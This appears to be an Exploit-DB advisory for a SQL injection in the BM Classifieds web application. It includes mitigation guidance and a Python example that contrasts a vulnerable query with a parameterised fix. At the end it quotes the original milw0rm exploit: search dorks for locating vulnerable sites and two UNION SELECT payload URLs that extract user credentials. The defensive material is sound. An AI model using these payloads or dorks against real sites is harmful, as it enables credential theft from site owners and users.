Vendor: BM Classifieds
Author: xcorpitx
CVSS: 9 (HIGH)
CWE: CWE-89 (SQL Injection)
Product Name: BM Classifieds
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Date: 2008

BM Classifieds (listingid), (ad) SQL Injection Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'listingid' parameter to the 'showad.php' script and the 'ad' parameter to the 'pfriendly.php' script. A remote attacker can execute arbitrary SQL commands against the application's database, compromise the application, access or modify data, exploit vulnerabilities in the underlying database and, in certain cases, gain access to the server.

Mitigation:

The application should validate and sanitize user-supplied input (here, the 'listingid' and 'ad' parameters) before using it in SQL queries, so that it cannot alter the structure of the query.
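The fix the mitigation describes, shown as an added example that is not code from BM Classifieds: the application's scripts are PHP, but the pattern is the same in any language, and Python's sqlite3 module is used here so the example runs stand-alone. The table names, columns and sample rows are constructed for the example. The vulnerable function mirrors the flaw (the raw 'listingid' value is concatenated into the SQL string, so a crafted value becomes part of the query); the hardened function applies an allow-list check (listing ids must be decimal integers) and binds the value as a query parameter, which the database driver never interprets as SQL. The same change applies to the 'ad' parameter of pfriendly.php.

```python
import sqlite3


def build_db():
    """Constructed in-memory stand-in for the application's tables.

    Table and column names are assumptions made for this example and are
    not taken from the advisory or the product.
    """
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE listings (listingid INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE users (username TEXT, email TEXT, password TEXT);
        INSERT INTO listings VALUES (1, 'Bike for sale', 'Good condition, constructed row');
        INSERT INTO users VALUES ('admin', 'admin@example.invalid', 'constructed-password-hash');
    """)
    return conn


def show_ad_vulnerable(conn, listingid):
    """The flawed pattern: the request parameter is spliced straight into SQL.

    Because the value is part of the query text, anything that is valid SQL
    after 'listingid=' is executed, which is exactly the weakness CWE-89 names.
    """
    sql = "SELECT title, body, 2 FROM listings WHERE listingid=" + str(listingid)
    return conn.execute(sql).fetchall()


def is_valid_listingid(value):
    """Allow-list check: a listing id is a string of decimal digits, nothing else."""
    return isinstance(value, str) and value.isdigit()


def show_ad_hardened(conn, listingid):
    """Validate the expected type, then bind the value instead of concatenating.

    Invalid input is rejected before any SQL is built (the web layer would
    answer with HTTP 400). The '?' placeholder makes the driver pass the id
    as data, so even a value that slipped past validation could not change
    the query's structure.
    """
    if not is_valid_listingid(listingid):
        raise ValueError("listingid must be a decimal integer")
    sql = "SELECT title, body, 2 FROM listings WHERE listingid=?"
    return conn.execute(sql, (int(listingid),)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("normal request:", show_ad_hardened(db, "1"))
    # A crafted value of the kind the advisory describes is rejected outright.
    crafted = "-99 UNION SELECT username, password, 2 FROM users"
    print("crafted value accepted by allow-list?", is_valid_listingid(crafted))
```

Type validation alone would already stop the values shown in this advisory; binding the parameter is kept as the second layer so the query stays safe if the validation rule is later relaxed (for example to allow non-numeric ids).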

Exploit-DB raw data:

..##.....##     
...##...##      
....##.##
.....###CoRPITX 
.....###     
....##.##
...##...##
..##.....##

########################### Turkey ####################################
#                                                                     #
#################### www.Hayalet-hack.com #############################
#
##################### www.zone-turk.net/###############################
#             
#Powered by BM Classifieds (listingid),(ad)SQL Injection Vulnerability 
#
#######################################################################
#  
#  AUTHOR : xcorpitx
#
#  HOME   : www.Hayalet-hack.com / www.zone-turk.net
#
########################################################################

########################################################################
#
#  Dork 1 : ''showad.php?listingid=''
#
#  Dork 2 : ''pfriendly.php?ad=''
#
########################################################################
#            
#  EXPLOIT: 
#
########################################################################
#
#
showad.php?listingid=xCoRpiTx&cat=-99/**/union+select/**/concat(username,0x3a,email),password,2/**/from/**/users/*
#
#
pfriendly.php?ad=-99%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0,1,concat(username,0x3a,email),password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%2F%2A%2A%2Ffrom%2F%2A%2A%2Fusers%2F%2A%2A%2F
#
#
########################################################################

Thanx :str0ke, pc faresi, s@bun,D3ng3s!z,hayalet,Turque,SmoKin

# milw0rm.com [2008-03-09]